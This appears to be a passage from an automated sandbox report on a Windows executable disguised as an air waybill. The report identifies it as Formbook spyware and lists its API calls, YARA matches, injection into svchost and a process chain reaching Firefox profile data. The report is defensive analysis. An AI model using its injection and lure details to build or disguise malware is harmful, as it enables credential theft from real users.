            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B20 NtQueryInformationProcess,2_2_02F72B20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B10 NtAllocateVirtualMemory,2_2_02F72B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B00 NtQueryValueKey,2_2_02F72B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F738D0 NtGetContextThread,2_2_02F738D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F729F0 NtReadFile,2_2_02F729F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F729D0 NtWaitForSingleObject,2_2_02F729D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72ED0 NtResumeThread,2_2_02F72ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EC0 NtQuerySection,2_2_02F72EC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EB0 NtProtectVirtualMemory,2_2_02F72EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtCreateProcessEx,2_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E50 NtCreateSection,2_2_02F72E50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E00 NtQueueApcThread,2_2_02F72E00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtSetValueKey,2_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtOpenDirectoryObject,2_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F00 NtCreateFile,2_2_02F72F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtDelayExecution,2_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CD0 NtEnumerateKey,2_2_02F72CD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73C90 NtOpenThread,2_2_02F73C90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C50 NtUnmapViewOfSection,2_2_02F72C50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C30 NtMapViewOfSection,2_2_02F72C30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73C30 NtOpenProcessToken,2_2_02F73C30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C20 NtSetInformationFile,2_2_02F72C20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C10 NtOpenProcess,2_2_02F72C10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DC0 NtAdjustPrivilegesToken,2_2_02F72DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DA0 NtReadVirtualMemory,2_2_02F72DA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D50 NtWriteVirtualMemory,2_2_02F72D50
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00464021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00464021
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00458858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458858
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0046545F
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0040E8000_2_0040E800
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042DBB50_2_0042DBB5
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0048804A0_2_0048804A
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0040E0600_2_0040E060
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004141400_2_00414140
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004224050_2_00422405
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004365220_2_00436522
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004806650_2_00480665
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0043267E0_2_0043267E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004168430_2_00416843
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042283A0_2_0042283A
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004389DF0_2_004389DF
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00418A0E0_2_00418A0E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00480AE20_2_00480AE2
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00436A940_2_00436A94
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0045EB070_2_0045EB07
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00468B130_2_00468B13
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042CD610_2_0042CD61
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004370060_2_00437006
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0041710E0_2_0041710E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004131900_2_00413190
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004012870_2_00401287
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004233C70_2_004233C7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042F4190_2_0042F419
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004216C40_2_004216C4
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004156800_2_00415680
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004158C00_2_004158C0
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004278D30_2_004278D3
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00421BB80_2_00421BB8
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00439D050_2_00439D05
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0040FE400_2_0040FE40
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00421FD00_2_00421FD0
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042BFE60_2_0042BFE6
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_010336100_2_01033610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028502_2_00402850
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100032_2_00410003
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E8232_2_0042E823
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012502_2_00401250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102232_2_00410223
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E29C2_2_0040E29C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2A32_2_0040E2A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033002_2_00403300
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024402_2_00402440
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416D0E2_2_00416D0E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416D132_2_00416D13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025F12_2_004025F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026002_2_00402600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D2EC2_2_02F2D2EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF124C2_2_02FF124C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5D2102_2_02F5D210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F313802_2_02F31380
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF3302_2_02FFF330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3102_2_02F4E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70F12_2_02FF70F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300010E2_2_0300010E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B0D02_2_02F4B0D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F300A02_2_02F300A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7508C2_2_02F7508C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE0762_2_02FEE076
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B1E02_2_02F5B1E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F451C02_2_02F451C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8717A2_2_02F8717A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD1302_2_02FDD130
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1132_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF6F62_2_02FFF6F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C6E02_2_02F3C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB36EC2_2_02FB36EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA6C02_2_02FFA6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F406802_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F646702_2_02F64670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FED6462_2_02FED646
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD62C2_2_02FDD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6002_2_02F5C600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F427602_2_02F42760
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A7602_2_02F4A760
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF67572_2_02FF6757
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A5262_2_0300A526
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F404452_2_02F40445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF5C92_2_02FFF5C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75C62_2_02FF75C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FAA02_2_02F5FAA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA892_2_02FFFA89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEA5B2_2_02FFEA5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCA132_2_02FFCA13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4BC02_2_02FB4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB2E2_2_02FFFB2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40B102_2_02F40B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DB192_2_02F7DB19
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF78F32_2_02FF78F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF18DA2_2_02FF18DA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F428C02_2_02F428C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB98B22_2_02FB98B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F568822_2_02F56882
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F498702_2_02F49870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B8702_2_02F5B870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF8722_2_02FFF872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268682_2_02F26868
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE08352_2_02FE0835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8102_2_02F6E810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438002_2_02F43800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F859C02_2_02F859C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3E9A02_2_02F3E9A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFE9A62_2_02FFE9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32EE82_2_02F32EE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF9ED22_2_02FF9ED2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41EB22_2_02F41EB2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0EAD2_2_02FF0EAD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0E6D2_2_02FE0E6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60E502_2_02F60E50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82E482_2_02F82E48
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F46FE02_2_02F46FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1FC62_2_02FF1FC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEFBF2_2_02FFEFBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF632_2_02FFFF63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CF002_2_02F4CF00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FCE02_2_02F5FCE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58CDF2_2_02F58CDF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD9C982_2_02FD9C98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6C692_2_02FF6C69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEC602_2_02FFEC60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEEC4C2_2_02FEEC4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AC202_2_02F4AC20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30C122_2_02F30C12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDFDF42_2_02FDFDF4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49DD02_2_02F49DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52DB02_2_02F52DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40D692_2_02F40D69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D4C2_2_02FF7D4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFD272_2_02FFFD27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300ACEB2_2_0300ACEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3AD002_2_02F3AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87BE4 appears 87 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B910 appears 251 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBEF10 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75050 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAE692 appears 84 times
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: String function: 00420D27 appears 70 times
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: String function: 00428B40 appears 42 times
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: String function: 00407F41 appears 35 times
            Source: AWB NO. 077-57676135055.exe, 00000000.00000003.18132666268.00000000040DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB NO. 077-57676135055.exe
            Source: AWB NO. 077-57676135055.exe, 00000000.00000003.18134277074.0000000003F33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB NO. 077-57676135055.exe
            Source: AWB NO. 077-57676135055.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/12
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046A2D5 GetLastError,FormatMessageW,0_2_0046A2D5
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00458713 AdjustTokenPrivileges,CloseHandle,0_2_00458713
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00458CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00458CC3
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B59E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0047F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047F121
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C602
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00404FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404FE9
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeFile created: C:\Users\user\AppData\Local\Temp\autF6BF.tmpJump to behavior
            Source: AWB NO. 077-57676135055.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RpcPing.exe, 00000004.00000003.19091477806.0000000007BEC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19091477806.0000000007BFA000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23189698242.0000000007BFA000.00000004.00000020.00020000.00000000.sdmp, 45570IH2.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: AWB NO. 077-57676135055.exeReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"Jump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wkscli.dllJump to behavior
